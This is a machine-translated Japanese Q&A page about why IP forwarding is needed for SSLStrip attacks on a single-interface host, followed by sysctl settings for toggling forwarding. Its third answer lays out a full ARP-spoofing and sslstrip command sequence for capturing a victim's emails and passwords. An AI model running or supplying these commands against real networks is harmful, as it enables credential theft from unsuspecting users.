SSLストリップ攻撃:「echo 1> /proc/sys/net/ipv4/ip_forward」と混同される

SSLストリップ攻撃:「echo 1> /proc/sys/net/ipv4/ip_forward」と混同される

SSLStrip攻撃では、IP forwarding次のコマンドを使用して有効にする必要があります。

echo 1 > /proc/sys/net/ipv4/ip_forward

このコマンドは、ホストが2つのネットワーク間でパケットを転送するルータとして機能できることを理解しています。これが私の混乱です。ネットワークインターフェイスが1つしかありませんが、なぜIP転送を設定できますか?eth0私の箱にあるのはこれがどのように機能するのでしょうか?

インターフェイスが1つしかない場合、転送は機能しますか?私たち二人はいなければなりませんか?

答え1

NIC(あなたの場合はeth0)が物理的に接続されたネットワークのみを考慮しているので、混乱しています。ただし、コンピュータはより多くのネットワークにアクセスできます。

お使いのコンピュータでIP転送を有効にすると、意図しないパケットを受信したときに通知されます。今後これを破棄するのではなく、ターゲット(またはネクストホップ)に移動します。この場合、お使いのコンピュータは次のように動作します。ゲートウェイその特定の目的地へ。

答え2

ポート転送を有効にすると、コンピュータのIP(eth0)をゲートウェイとして設定し、パケットを送信できます。 iptables FORWARDリンクがこれらのパケットを受け入れると、そのパケットを宛先に転送します。

答え3

root@kali# echo 1 > /proc/sys/net/ipv4/ip_forward

root@kali# iptables -t nat -A PREROUTING --dport 80 -j REDIRECT --to-port 1000

root@kali# sslstrip -a -l 1000 -k

今新しい端末で書く

root@kali# arpspoof -i eth0 victimip routerip

新しい端末に記入してください。

root@kali# arpspoof -i eth0 routerip victimip

リアルタイムの電子メールとパスワードを表示するには、別の端末を作成する必要があります。

root@kali# tail -f sslstrip.log

注意:すべての端末を閉じてはいけません。

出力番号 1 は、IP 転送が有効であることを示します。上記の値はLinux procファイルシステム、より正確には実際のファイルファイル/proc/sys/net/ipv4/ip_forwardから読み取られます。

# cat /proc/sys/net/ipv4/ip_forward
1

実行中のLinuxシステムでIP転送を無効にするには、次の手順を実行します。

 # echo 0 > /proc/sys/net/ipv4/ip_forward

上記の変更は再起動後も保持されません。 Linux システムで IP 転送を永久に無効にするには、/etc/sysctl.conf次の行を編集して追加します。

net.ipv4.ip_forward = 0

Linux で IP 転送を有効にするプロセスは上記の無効化と同じですが、数値 1 を使用して IP 転送を有効にします。

# echo 1 > /proc/sys/net/ipv4/ip_forward

変更を永続的に適用するには、editに次の行を挿入または編集します/etc/sysctl.conf

net.ipv4.ip_forward = 1

関連情報